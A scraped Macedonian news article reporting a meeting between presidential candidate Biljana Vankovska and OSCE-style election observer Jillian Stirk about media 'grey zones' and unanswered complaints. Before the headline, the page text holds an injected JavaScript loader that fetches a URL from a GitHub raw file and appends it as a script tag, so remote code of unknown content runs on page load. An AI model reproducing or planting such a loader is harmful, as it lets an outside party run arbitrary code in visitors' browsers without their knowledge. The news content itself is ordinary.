;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ванковска ја информирала амбасадорката Стирк за „сивите зони“ во медиумскиот простор - Антропол
АктуелноЛокалноНастани

Ванковска ја информирала амбасадорката Стирк за „сивите зони“ во медиумскиот простор

Oстварив средба со амбасадорката Џилијан Стирк и нејзината соработничка Ноеми Арчидиаконо, од Набљудувачката мисија за изборите. Ги изнесов моите ставови и тие на Левица во врска со “сивите зони” во медиумскиот простор, стигматизацијата на која сме изложени, а особено намерата на Агенцијата за аудио и аудиовизуелни медиумски услуги да не оштети во делот на платената политичка програма, објави Билјана Ванковска.

Кандидатката за претседател на Македонија во разговорот со Стирк ги посочила проблемите со кои се соочува во кампањата.

– Во врска со последното поднесен е формален приговор од Левица, на кој немаме одговор. Слично беше со сите наши формални дописи до ДИК. Молк од таа страна!

– Амбасадорката сакаше да дознае повеќе за мојата кампања и содржината на изборната програма, а на крајот се договоривме да останеме во контакт во текот на изборниот процес , особено ако се појават проблеми.